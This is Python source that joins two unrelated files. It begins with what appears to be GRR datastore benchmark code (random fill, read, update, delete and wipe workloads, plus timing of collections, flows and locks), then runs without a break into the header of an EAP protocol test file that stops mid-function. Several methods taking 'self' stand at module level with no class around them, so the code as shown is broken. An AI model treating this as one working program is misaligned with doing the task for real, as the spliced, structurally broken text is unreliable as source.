      self.values += number_timestamps
      self.predicates += 1
      values = [(new_value, t) for t in ts]
      data_store.DB.MultiSet(
          subject, {self.predicate_template % j: values},
          replace=False,
          timestamp=100,
          token=self.token)
      self.Register()
  data_store.DB.Flush()
def _DeleteRandom(self, subjects, fraction, change_test=True):
  """Delete predicates/subjects/values at random.

  For each subject selected by `fraction`, randomly deletes either one
  timestamped value per predicate (which == 0, falling back to full
  predicate deletion when empty), whole predicates (which == 1), or the
  entire subject (which == 2). Counters track what was removed.
  """
  if change_test:
    self.test_name = "delete %d%%" % fraction
  subjects_to_delete = []
  for i, info in subjects.items():
    subject = info["name"]
    predicates = info["attrs"]
    number_predicates = len(predicates)
    do_it = (self.rand.randint(0, 100) <= fraction)
    which = self.rand.randint(0, 2)
    count_values = 0
    predicates_to_delete = []
    for j, timestamp_info in predicates.items():
      number_timestamps = len(timestamp_info)
      count_values += number_timestamps
      if do_it:
        if which == 0:
          # Delete one timestamp'ed value.
          if timestamp_info:
            ts = timestamp_info[0]
            data_store.DB.DeleteAttributes(
                subject, [self.predicate_template % j],
                start=ts,
                end=ts,
                token=self.token)
            self.values -= 1
            timestamp_info.pop(0)
            self.Register()
          else:
            # No values left for this predicate: delete it entirely.
            which = 1
        if which == 1:
          # Delete the attribute itself.
          data_store.DB.DeleteAttributes(
              subject, [self.predicate_template % j], token=self.token)
          self.values -= number_timestamps
          self.predicates -= 1
          predicates_to_delete.append(j)
          self.Register()
    if do_it and which == 1:
      for j in predicates_to_delete:
        del predicates[j]
    if do_it and which == 2:
      # Delete subject.
      data_store.DB.DeleteSubject(subject, token=self.token)
      self.predicates -= number_predicates
      self.values -= count_values
      self.subjects -= 1
      subjects_to_delete.append(i)
      self.Register()
  for i in subjects_to_delete:
    del subjects[i]
  data_store.DB.Flush()
def _GrowRandomly(self, subjects, fraction, nclients, change_test=True):
  """Adds new clients/subjects to the database.

  Grows the subject set by `fraction` percent, spreading the new
  subjects over `nclients` freshly generated client URNs.
  """
  if change_test:
    self.test_name = "add %d%%" % fraction
  how_many = int(float(len(subjects)) * float(fraction) / 100)
  new_value = os.urandom(100)
  # New subject keys continue after the current maximum key.
  new_subject = max(subjects.iteritems(), key=operator.itemgetter(0))[0] + 1
  # Generate client names.
  clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
  for i in xrange(new_subject, new_subject + how_many):
    client = clients[self.rand.randint(0, nclients - 1)]
    self._AddNewSubject(client, subjects, i, new_value)
  data_store.DB.Flush()
def _GenerateRandomSubject(self):
  """Build a random relative path of 1 to 5 random string components."""
  component_count = self.rand.randint(1, 5)
  components = []
  for _ in xrange(component_count):
    components.append(self._GenerateRandomString(self.rand.randint(5, 10)))
  return "/".join(components)
def _AddNewSubject(self, client, subjects, i, value, max_attributes=3):
  """Add a new subject to the database.

  Writes 1..max_attributes-1 predicates, each with 1-2 timestamped
  values, and records the subject under key `i` in `subjects`.
  """
  number_predicates = self.rand.randrange(1, max_attributes)
  self.subjects += 1
  predicates = dict.fromkeys(xrange(number_predicates))
  self.predicates += number_predicates
  subject = str(client.Add(self._GenerateRandomSubject()))
  for j in xrange(number_predicates):
    number_timestamps = self.rand.randrange(1, 3)
    self.values += number_timestamps
    ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
    predicates[j] = ts
    values = [(value, t) for t in ts]
    data_store.DB.MultiSet(
        subject, {self.predicate_template % j: values},
        timestamp=100,
        replace=False,
        sync=False,
        token=self.token)
    self.Register()
  info = {"name": subject, "attrs": predicates}
  subjects[i] = info
def _ReadLinear(self, subjects, fraction):
  """Linearly read a random ~fraction percent of subjects from the database.

  Bug fix: the original used `return` when a subject fell outside the
  sampled fraction, which aborted the whole scan at the first miss (on
  average only ~1 subject was ever read, regardless of `fraction`).
  Skipping the subject with `continue` matches the sampling pattern used
  by _UpdateRandom and the "read linear N%" intent of the benchmark.
  """
  self.test_name = "read linear %d%%" % fraction
  for i in subjects:
    if self.rand.randint(0, 100) > fraction:
      continue
    subject = subjects[i]["name"]
    predicates = subjects[i]["attrs"]
    self._RandomlyReadSubject(subject, predicates)
def _AddManyAttributes(self, subjects, many):
  """Add lots of predicates to a given number of subjects.

  Picks `many` subjects (with replacement) and adds roughly
  BIG_NUM_ATTRIBUTES..BIG_NUM_ATTRIBUTES+1000 new predicates to each.
  """
  self.test_name = "add +attrs %d" % many
  new_value = os.urandom(100)
  for _ in range(0, many):
    i = self.rand.choice(subjects.keys())
    subject = subjects[i]["name"]
    predicates = subjects[i]["attrs"]
    how_many = self.rand.randint(self.BIG_NUM_ATTRIBUTES,
                                 self.BIG_NUM_ATTRIBUTES + 1000)
    self.predicates += how_many
    # Continue numbering after the subject's current largest predicate id.
    new_predicate = max(
        predicates.iteritems(), key=operator.itemgetter(0))[0] + 1
    for j in xrange(new_predicate, new_predicate + how_many):
      number_timestamps = self.rand.randrange(1, 3)
      ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
      self.values += number_timestamps
      values = [(new_value, t) for t in ts]
      predicates[j] = ts
      data_store.DB.MultiSet(
          subject, {self.predicate_template % j: values},
          replace=False,
          timestamp=100,
          sync=False,
          token=self.token)
      self.Register()
  data_store.DB.Flush()
def _RemoveManyAttributes(self, subjects, fraction):
  """Delete all predicates (except 1) from subjects with many predicates.

  Visits every subject with at least BIG_NUM_ATTRIBUTES predicates, and
  strips one in every `often` of them down to a single predicate.
  """
  self.test_name = "del +attrs %d%%" % fraction
  # Python 2 integer division: act on every (100/fraction)-th big subject.
  often = 100 / fraction
  count = 0
  for i in subjects:
    subject = subjects[i]["name"]
    predicates = subjects[i]["attrs"]
    number_predicates = len(predicates)
    if number_predicates >= self.BIG_NUM_ATTRIBUTES:
      count += 1
      if count == often:
        count = 0
        # Keep the first predicate, delete all the others.
        predicates_to_delete = [j for j in predicates.keys()[1:]]
        values_deleted = sum(len(predicates[x]) for x in predicates_to_delete)
        self.values -= values_deleted
        self.predicates -= len(predicates_to_delete)
        for j in predicates_to_delete:
          del predicates[j]
          data_store.DB.DeleteAttributes(
              subject, [self.predicate_template % j],
              sync=False,
              token=self.token)
          self.Register()
  data_store.DB.Flush()
def _Wipeout(self, subjects):
  """Delete every subject from the database."""
  self.test_name = "wipeout"
  for i in subjects:
    subject = subjects[i]["name"]
    predicates = subjects[i]["attrs"]
    number_predicates = len(predicates)
    count_values = 0
    for j in predicates:
      count_values += len(predicates[j])
    data_store.DB.DeleteSubject(subject, token=self.token)
    self.predicates -= number_predicates
    self.values -= count_values
    self.subjects -= 1
    self.Register()

  # NOTE(review): this rebinds the local name only and does not clear the
  # caller's dict; subjects.clear() may have been intended — harmless today
  # since _Wipeout is always the last step of each benchmark. Confirm.
  subjects = {}
  data_store.DB.Flush()
def _DoMix(self, subjects):
  """Do a mix of database operations."""
  self.test_name = "mix"
  # One randomly chosen operation per iteration, dispatched by index so the
  # random draw matches the original 0..3 mapping exactly.
  operations = [
      lambda: self._ReadRandom(subjects, 14, False),
      lambda: self._GrowRandomly(subjects, 5, 20, False),
      lambda: self._UpdateRandom(subjects, 10, False),
      lambda: self._DeleteRandom(subjects, 4, False),
  ]
  for _ in xrange(0, len(subjects) / 2000):
    operations[self.rand.randint(0, 3)]()
def _GenerateRandomClient(self):
  """Return a ClientURN with a random 16-digit, zero-padded client id."""
  client_id = self.rand.randint(0, (10**16) - 1)
  return rdf_client.ClientURN("C.%016d" % client_id)
def _FillDatabase(self, nsubjects, nclients, max_attributes=3):
  """Fill the database with a certain number of subjects and clients.

  Returns:
    The bookkeeping dict mapping subject key -> {"name", "attrs"} used by
    all other benchmark helpers.
  """
  # Fixed seed so every benchmark run generates the same workload.
  self.rand = random.Random(0)
  self.test_name = "fill"
  self.AddResult(self.test_name, 0, self.steps,
                 data_store.DB.Size(), 0, 0, 0, 0)
  subjects = dict.fromkeys(xrange(nsubjects))
  value = os.urandom(100)
  clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
  for i in subjects:
    client = self.rand.choice(clients)
    self._AddNewSubject(client, subjects, i, value, max_attributes)
  data_store.DB.Flush()
  return subjects
def _GenerateRandomString(self, chars):
  """Return a random string of `chars` ASCII letters."""
  letters = []
  for _ in xrange(chars):
    letters.append(self.rand.choice(string.ascii_letters))
  return "".join(letters)
def _AddBlobs(self, howmany, size):
  """Adds 'howmany' blobs with size 'size' kbs."""
  self.test_name = "add blobs %dx%dk" % (howmany, size)
  count = 0
  # Emit a result row roughly every 10% of the blobs.
  often = howmany / 10

  for count in xrange(howmany):
    data = self._GenerateRandomString(1024 * size)
    data_store.DB.StoreBlob(data, token=self.token)

    if count % often == 0:
      # Because adding blobs, takes too long we force the output of
      # new results.
      self.Register(force=True)

  self.Register(force=True)
  data_store.DB.Flush()
@test_lib.SetLabel("benchmark")
def manySubjectsFewAttrs(self):
  """Database with many subjects with few attributes."""
  subjects = self._FillDatabase(25000, 500)
  self._ReadLinear(subjects, 50)
  self._UpdateRandom(subjects, 50)
  self._ReadRandom(subjects, 70)
  self._DeleteRandom(subjects, 40)
  self._GrowRandomly(subjects, 40, 50)
  self._ReadRandom(subjects, 100)
  self._DoMix(subjects)
  self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def manySubjectsFewWithManyAttrs(self):
  """Database where a few subjects have many attributes."""
  subjects = self._FillDatabase(25000, 500)
  self._UpdateRandom(subjects, 50)
  # Inflate a subset of subjects with many attributes, then measure
  # reads both before and after trimming them back down.
  self._AddManyAttributes(subjects, 100)
  self._ReadRandom(subjects, 30)

  # For 1/2 of the subjects with many attributes, remove all but
  # one of the attributes.
  self._RemoveManyAttributes(subjects, 50)
  self._ReadRandom(subjects, 30)
  self._UpdateRandom(subjects, 50)
  self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def fewSubjectsManyAttrs(self):
  """Database with a few subjects with many attributes."""
  # Small subject count (100 subjects, 5 clients) so attribute volume
  # dominates the measurements.
  subjects = self._FillDatabase(100, 5)
  self._UpdateRandom(subjects, 100)
  self._AddManyAttributes(subjects, 50)
  self._ReadRandom(subjects, 30)
  self._RemoveManyAttributes(subjects, 50)
  self._ReadRandom(subjects, 50)
  self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def blobs(self):
  """Database that stores blobs of increasing size."""
  subjects = self._FillDatabase(10000, 200)

  def _ReadUpdate():
    # Interleave reads/updates between blob batches so blob growth and
    # row operations are measured together.
    self._ReadRandom(subjects, 75)
    self._UpdateRandom(subjects, 20)

  _ReadUpdate()

  # Batches of progressively larger blobs: 512 KiB up to 100 MiB.
  self._AddBlobs(50, 512)
  _ReadUpdate()

  self._AddBlobs(50, 2048)
  _ReadUpdate()

  self._AddBlobs(50, 10240)
  _ReadUpdate()

  self._AddBlobs(20, 10240 * 10)
  _ReadUpdate()
@test_lib.SetLabel("benchmark")
def manySubjectsManyAttrs(self):
  """Database with many subjects with many attributes."""
  # Same workload shape as manySubjectsFewAttrs, but every subject is
  # created with up to 50 attributes instead of the default 3.
  subjects = self._FillDatabase(25000, 500, 50)
  self._ReadLinear(subjects, 50)
  self._UpdateRandom(subjects, 50)
  self._ReadRandom(subjects, 50)
  self._DeleteRandom(subjects, 40)
  self._GrowRandomly(subjects, 40, 50)
  self._ReadRandom(subjects, 50)
  self._DoMix(subjects)
  self._Wipeout(subjects)
class DataStoreBenchmarks(test_lib.MicroBenchmarks):
  """Datastore micro benchmarks.

  These tests should be run with --labels=benchmark
  """
  # Dedicated queue so benchmark flows do not interfere with other tests.
  queue = rdfvalue.RDFURN("BENCHMARK")
  units = "s"
  labels = ["large"]

  def setUp(self):
    super(DataStoreBenchmarks, self).setUp()
    self.InitDatastore()
    # Shared 50-worker thread pool used by the "Multithreaded:" benchmarks.
    self.tp = threadpool.ThreadPool.Factory("test_pool", 50)
    self.tp.Start()

  def tearDown(self):
    super(DataStoreBenchmarks, self).tearDown()
    self.tp.Stop()
    self.DestroyDatastore()

  def InitDatastore(self):
    """Initiates custom data store."""

  def DestroyDatastore(self):
    """Destroys custom data store."""

  def GenerateFiles(self, client_id, n, directory="dir/dir"):
    """Return n synthetic StatEntry results under the given directory."""
    res = []
    for i in xrange(n):
      res.append(
          rdf_client.StatEntry(
              # Fixed stat values; only the path varies per entry.
              aff4path="aff4:/%s/fs/os/%s/file%d" % (client_id, directory, i),
              st_mode=33261,
              st_ino=1026267,
              st_dev=51713,
              st_nlink=1,
              st_uid=0,
              st_gid=0,
              st_size=60064,
              st_atime=1308964274,
              st_mtime=1285093975,
              st_ctime=1299502221,
              st_blocks=128,
              st_blksize=4096,
              st_rdev=0,
              pathspec=rdf_paths.PathSpec(
                  path="/dir/dir/file%d" % i, pathtype=0)))
    return res

  def StartFlow(self, client_id):
    """Start a ListDirectory flow and queue synthetic responses for it."""
    flow_id = flow.GRRFlow.StartFlow(
        client_id=client_id,
        flow_name="ListDirectory",
        queue=self.queue,
        pathspec=rdf_paths.PathSpec(
            path="/",
            pathtype="OS",),
        token=self.token)
    self.flow_ids.append(flow_id)

    messages = []
    for d in range(self.nr_dirs):
      messages += self.GenerateFiles(client_id, self.files_per_dir,
                                     "dir/dir%d" % d)

    # Terminate the request with a status message.
    messages.append(rdf_flows.GrrStatus())

    with queue_manager.QueueManager(token=self.token) as flow_manager:
      for i, payload in enumerate(messages):
        msg = rdf_flows.GrrMessage(
            session_id=flow_id,
            request_id=1,
            response_id=1 + i,
            auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
            payload=payload)
        if isinstance(payload, rdf_flows.GrrStatus):
          # type 1 marks the message as a status response.
          msg.type = 1
        flow_manager.QueueResponse(flow_id, msg)

  # Workload size for testSimulateFlows.
  nr_clients = 4
  nr_dirs = 4
  files_per_dir = 500

  def _GenerateRandomString(self, chars):
    """Return a random string of `chars` ASCII letters."""
    return "".join(
        [self.rand.choice(string.ascii_letters) for _ in xrange(chars)])

  # Constants to control the size of testCollections. These numbers run in a
  # reasonable amount of time for a unit test [O(20s)] on most data stores.
  RECORDS = 5000
  RECORD_SIZE = 1000
  READ_COUNT = 50
  BIG_READ_SIZE = 25

  # The sequential collection index is only computed for records 5m old, so we
  # write records this far in the past in order to force index creation.
  INDEX_DELAY = rdfvalue.Duration("10m")

  @test_lib.SetLabel("benchmark")
  def testCollections(self):
    """Benchmark packed-versioned and indexed sequential collections."""
    self.rand = random.Random(42)

    #
    # Populate and exercise a packed versioned collection.
    #
    packed_collection_urn = rdfvalue.RDFURN("aff4:/test_packed_collection")
    packed_collection = aff4.FACTORY.Create(
        packed_collection_urn,
        collects.PackedVersionedCollection,
        mode="w",
        token=self.token)
    packed_collection.Close()

    start_time = time.time()
    for _ in range(self.RECORDS):
      collects.PackedVersionedCollection.AddToCollection(
          packed_collection_urn,
          rdfvalue.RDFString(self._GenerateRandomString(self.RECORD_SIZE)),
          token=self.token)
    elapsed_time = time.time() - start_time
    self.AddResult("Packed Coll. Add (size %d)" % self.RECORD_SIZE,
                   elapsed_time, self.RECORDS)

    with aff4.FACTORY.OpenWithLock(
        packed_collection_urn, lease_time=3600,
        token=self.token) as packed_collection:
      start_time = time.time()
      packed_collection.Compact()
      elapsed_time = time.time() - start_time
    self.AddResult("Packed Coll. Compact", elapsed_time, 1)

    packed_collection = aff4.FACTORY.Create(
        packed_collection_urn,
        collects.PackedVersionedCollection,
        mode="r",
        token=self.token)

    # Random single-record reads: break out of the generator after one item.
    start_time = time.time()
    for _ in range(self.READ_COUNT):
      for _ in packed_collection.GenerateItems(offset=self.rand.randint(
          0, self.RECORDS - 1)):
        break
    elapsed_time = time.time() - start_time
    self.AddResult("Packed Coll. random 1 record reads", elapsed_time,
                   self.READ_COUNT)

    # Random BIG_READ_SIZE-record reads.
    start_time = time.time()
    for _ in range(self.READ_COUNT):
      count = 0
      for _ in packed_collection.GenerateItems(offset=self.rand.randint(
          0, self.RECORDS - self.BIG_READ_SIZE)):
        count += 1
        if count >= self.BIG_READ_SIZE:
          break
    elapsed_time = time.time() - start_time
    self.AddResult("Packed Coll. random %d record reads" % self.BIG_READ_SIZE,
                   elapsed_time, self.READ_COUNT)

    start_time = time.time()
    for _ in packed_collection.GenerateItems():
      pass
    elapsed_time = time.time() - start_time
    self.AddResult("Packed Coll. full sequential read", elapsed_time, 1)

    #
    # Populate and exercise an indexed sequential collection.
    #
    indexed_collection = aff4.FACTORY.Create(
        "aff4:/test_seq_collection",
        StringSequentialCollection,
        mode="rw",
        token=self.token)

    start_time = time.time()
    for _ in range(self.RECORDS):
      # Backdate records by INDEX_DELAY to force index creation.
      indexed_collection.Add(
          rdfvalue.RDFString(self._GenerateRandomString(self.RECORD_SIZE)),
          timestamp=rdfvalue.RDFDatetime.Now() - self.INDEX_DELAY)
    elapsed_time = time.time() - start_time
    self.AddResult("Seq. Coll. Add (size %d)" % self.RECORD_SIZE, elapsed_time,
                   self.RECORDS)

    start_time = time.time()
    self.assertEqual(len(indexed_collection), self.RECORDS)
    elapsed_time = time.time() - start_time
    self.AddResult("Seq. Coll. Read to end", elapsed_time, 1)

    start_time = time.time()
    for _ in range(self.READ_COUNT):
      for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
          0, self.RECORDS - 1)):
        break
    elapsed_time = time.time() - start_time
    self.AddResult("Seq. Coll. random 1 record reads", elapsed_time,
                   self.READ_COUNT)

    start_time = time.time()
    for _ in range(self.READ_COUNT):
      count = 0
      for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
          0, self.RECORDS - self.BIG_READ_SIZE)):
        count += 1
        if count >= self.BIG_READ_SIZE:
          break
    elapsed_time = time.time() - start_time
    self.AddResult("Seq. Coll. random %d record reads" % self.BIG_READ_SIZE,
                   elapsed_time, self.READ_COUNT)

    start_time = time.time()
    for _ in indexed_collection.GenerateItems():
      pass
    elapsed_time = time.time() - start_time
    self.AddResult("Seq. Coll. full sequential read", elapsed_time, 1)

  @test_lib.SetLabel("benchmark")
  def testSimulateFlows(self):
    """Benchmark flow message generation and worker processing."""
    self.flow_ids = []
    self.units = "s"

    client_ids = ["C.%016X" % j for j in range(1, self.nr_clients + 1)]

    start_time = time.time()

    # Start one flow per client in parallel via the thread pool.
    for client_id in client_ids:
      self.tp.AddTask(self.StartFlow, (client_id,))
    self.tp.Join()

    notifications = [
        rdf_flows.GrrNotification(session_id=f) for f in self.flow_ids
    ]
    with queue_manager.QueueManager(token=self.token) as manager:
      manager.MultiNotifyQueue(notifications)

    time_used = time.time() - start_time

    self.AddResult("Generate Messages (%d clients, %d files)" % (
        self.nr_clients, self.nr_dirs * self.files_per_dir), time_used, 1)

    my_worker = worker.GRRWorker(queues=[self.queue], token=self.token)

    start_time = time.time()

    # Drain the queue completely before stopping the clock.
    while my_worker.RunOnce():
      pass
    my_worker.thread_pool.Join()

    time_used = time.time() - start_time

    self.AddResult("Process Messages", time_used, 1)

  @test_lib.SetLabel("benchmark")
  def testMicroBenchmarks(self):
    """Run all micro benchmarks in a deterministic order."""
    # Tests run in arbitrary order but for the benchmarks, the order makes a
    # difference so we call them all from one test here.
    self.n = 1000
    # NOTE(review): relies on Python 2 integer division (self.n / 100 == 10).
    self.small_n = self.n / 100
    self.units = "ms"

    self.BenchmarkWriting()
    self.BenchmarkReading()
    self.BenchmarkWritingThreaded()
    self.BenchmarkReadingThreaded()
    self.BenchmarkAFF4Locks()

  def BenchmarkWriting(self):
    """Measure single-threaded writes: rows, attributes, versions, blobs."""
    subject_template = "aff4:/row%d"
    predicate_template = "task:flow%d"
    value = os.urandom(100)
    large_value = os.urandom(10 * 1024 * 1024)

    # Many subjects, one attribute each.
    start_time = time.time()
    for i in xrange(self.n):
      data_store.DB.Set(
          subject_template % i, "task:flow", value, token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Set rows", (end_time - start_time) / self.n, self.n)

    # One subject, many attributes.
    start_time = time.time()
    for i in xrange(self.n):
      data_store.DB.Set(
          "aff4:/somerow", predicate_template % i, value, token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Set attributes", (end_time - start_time) / self.n, self.n)

    # One attribute, many versions (replace=False keeps history).
    start_time = time.time()
    for i in xrange(self.n):
      data_store.DB.Set(
          "aff4:/somerow",
          "task:someflow",
          value,
          replace=False,
          token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Set versions", (end_time - start_time) / self.n, self.n)

    # 10 MiB values; only small_n iterations to keep runtime bounded.
    start_time = time.time()
    for i in xrange(self.small_n):
      data_store.DB.Set(
          "aff4:/largerow%d" % i,
          "task:largeflow",
          large_value,
          replace=False,
          token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Set large values", (end_time - start_time) / self.small_n,
                   self.small_n)

  def BenchmarkReading(self):
    """Measure single-threaded reads of the data written by BenchmarkWriting."""
    subject_template = "aff4:/row%d"
    predicate_template = "task:flow%d"

    start_time = time.time()
    for i in xrange(self.n):
      data_store.DB.Resolve(subject_template % i, "task:flow", token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Get rows", (end_time - start_time) / self.n, self.n)

    start_time = time.time()
    for i in xrange(self.n):
      data_store.DB.Resolve(
          "aff4:/somerow", predicate_template % i, token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Get attributes", (end_time - start_time) / self.n, self.n)

    start_time = time.time()
    for i in xrange(self.small_n):
      data_store.DB.ResolvePrefix(
          "aff4:/somerow",
          "task:someflow",
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          token=self.token)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Get all versions", (end_time - start_time) / self.small_n,
                   self.small_n)

    start_time = time.time()
    for i in xrange(self.small_n):
      res = data_store.DB.ResolvePrefix(
          "aff4:/largerow%d" % i,
          "task:largeflow",
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          token=self.token)
      # Sanity-check that the 10 MiB value written earlier round-trips.
      self.assertEqual(len(res), 1)
      self.assertEqual(len(res[0][1]), 10 * 1024 * 1024)
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Get large values", (end_time - start_time) / self.small_n,
                   self.small_n)

  def BenchmarkWritingThreaded(self):
    """Same write workloads as BenchmarkWriting, fanned out over the pool."""
    subject_template = "aff4:/threadedrow%d"
    predicate_template = "task:threadedflow%d"
    value = os.urandom(100)
    large_value = os.urandom(10 * 1024 * 1024)

    start_time = time.time()
    for i in xrange(self.n):
      self.tp.AddTask(data_store.DB.Set, (
          subject_template % i, "task:threadedflow", value, None, self.token))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Set rows", (end_time - start_time) / self.n,
                   self.n)

    start_time = time.time()
    for i in xrange(self.n):
      self.tp.AddTask(data_store.DB.Set,
                      ("aff4:/somerowthreaded", predicate_template % i, value,
                       None, self.token))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Set attributes",
                   (end_time - start_time) / self.n, self.n)

    # Trailing False is the positional replace argument (keep versions).
    start_time = time.time()
    for i in xrange(self.n):
      self.tp.AddTask(data_store.DB.Set,
                      ("aff4:/somerowthreaded", "task:someflowthreaded", value,
                       None, self.token, False))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Set versions",
                   (end_time - start_time) / self.n, self.n)

    start_time = time.time()
    for i in xrange(self.small_n):
      self.tp.AddTask(data_store.DB.Set,
                      ("aff4:/threadedlargerow%d" % i, "task:largeflowthreaded",
                       large_value, None, self.token, False))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Set large values",
                   (end_time - start_time) / self.small_n, self.small_n)

  def ResolvePrefixAndCheck(self, subject, predicate, expected_items=1000):
    """ResolvePrefix over all timestamps and assert the result count."""
    res = data_store.DB.ResolvePrefix(
        subject,
        predicate,
        token=self.token,
        timestamp=data_store.DB.ALL_TIMESTAMPS)
    self.assertEqual(len(list(res)), expected_items)

  def BenchmarkReadingThreaded(self):
    """Same read workloads as BenchmarkReading, fanned out over the pool."""
    subject_template = "aff4:/threadedrow%d"
    predicate_template = "task:threadedflow%d"

    start_time = time.time()
    for i in xrange(self.n):
      self.tp.AddTask(data_store.DB.Resolve, (subject_template % i,
                                              "task:threadedflow", self.token))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Get rows", (end_time - start_time) / self.n,
                   self.n)

    start_time = time.time()
    for i in xrange(self.n):
      self.tp.AddTask(data_store.DB.Resolve, (
          "aff4:/somerowthreaded", predicate_template % i, self.token))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Get attributes",
                   (end_time - start_time) / self.n, self.n)

    start_time = time.time()
    for i in xrange(self.small_n):
      self.tp.AddTask(self.ResolvePrefixAndCheck, ("aff4:/somerowthreaded",
                                                   "task:someflowthreaded"))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Get all versions",
                   (end_time - start_time) / self.small_n, self.small_n)

    start_time = time.time()
    for i in xrange(self.small_n):
      self.tp.AddTask(self.ResolvePrefixAndCheck, (
          "aff4:/threadedlargerow%d" % i, "task:largeflowthreaded", 1))
    self.tp.Join()
    data_store.DB.Flush()
    end_time = time.time()

    self.AddResult("Multithreaded: Get large values",
                   (end_time - start_time) / self.small_n, self.small_n)

  def BenchmarkAFF4Locks(self):
    """Measure OpenWithLock both serially and via the thread pool."""
    self.client_id = "C.%016X" % 999

    # Write some data to read.
    client = aff4.FACTORY.Create(
        self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
    client.Set(client.Schema.HOSTNAME("client1"))
    client.Close()

    cl = aff4.FACTORY.Open(self.client_id, token=self.token)
    self.assertEqual(cl.Get(cl.Schema.HOSTNAME), "client1")

    # Collect exceptions in threads.
    self.fails = []

    def Thread():
      try:
        # Using blocking_lock_timeout of 10 minutes to avoid possible
        # timeouts when running tests on slow hardware.
        with aff4.FACTORY.OpenWithLock(
            self.client_id,
            token=self.token,
            blocking=True,
            blocking_sleep_interval=0.2,
            blocking_lock_timeout=600) as client:
          self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
      except Exception as e:  # pylint: disable=broad-except
        self.fails.append(e)

    start_time = time.time()
    for _ in xrange(self.n):
      Thread()
    end_time = time.time()

    self.AddResult("OpenWithLock", (end_time - start_time) / self.n, self.n)

    self.assertEqual(len(self.fails), 0)

    start_time = time.time()
    for _ in xrange(self.n):
      self.tp.AddTask(Thread, ())
    self.tp.Join()
    end_time = time.time()

    self.AddResult("Multithreaded: OpenWithLock",
                   (end_time - start_time) / self.n, self.n)

    self.assertEqual(len(self.fails), 0)
# EAP protocol tests
# Copyright (c) 2014-2015, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import select
import struct
import threading
import time
import hostapd
from utils import HwsimSkip, alloc_fail, fail_test, wait_fail_trigger
from test_ap_eap import check_eap_capa, check_hlr_auc_gw_support
from test_erp import check_erp_capa
# EAP Code field values.
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_CODE_INITIATE = 5
EAP_CODE_FINISH = 6

# EAP method Type values used by the tests in this file.
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53

# Type field in EAP-Initiate and EAP-Finish messages
EAP_ERP_TYPE_REAUTH_START = 1
EAP_ERP_TYPE_REAUTH = 2

# ERP TLV/TV attribute types.
EAP_ERP_TLV_KEYNAME_NAI = 1
EAP_ERP_TV_RRK_LIFETIME = 2
EAP_ERP_TV_RMSK_LIFETIME = 3
EAP_ERP_TLV_DOMAIN_NAME = 4
EAP_ERP_TLV_CRYPTOSUITES = 5
EAP_ERP_TLV_AUTHORIZATION_INDICATION = 6
EAP_ERP_TLV_CALLED_STATION_ID = 128
EAP_ERP_TLV_CALLING_STATION_ID = 129
EAP_ERP_TLV_NAS_IDENTIFIER = 130
EAP_ERP_TLV_NAS_IP_ADDRESS = 131
EAP_ERP_TLV_NAS_IPV6_ADDRESS = 132
def run_pyrad_server(srv, t_stop, eap_handler):
    """Thread entry point: run the pyrad server until t_stop is set."""
    srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
    """Start a minimal pyrad-based RADIUS server in a background thread.

    eap_handler(ctx, eap) is called for each received EAP message and must
    return the next raw EAP payload to send (or None).  Returns a dict with
    'srv', 'stop' (threading.Event) and 'thread' keys; pass it to
    stop_radius_server() to shut down.  Raises HwsimSkip when pyrad is not
    installed.
    """
    try:
        import pyrad.server
        import pyrad.packet
        import pyrad.dictionary
    except ImportError:
        raise HwsimSkip("No pyrad modules available")

    class TestServer(pyrad.server.Server):
        def _HandleAuthPacket(self, pkt):
            pyrad.server.Server._HandleAuthPacket(self, pkt)
            # Reassemble the EAP payload from the EAP-Message attributes
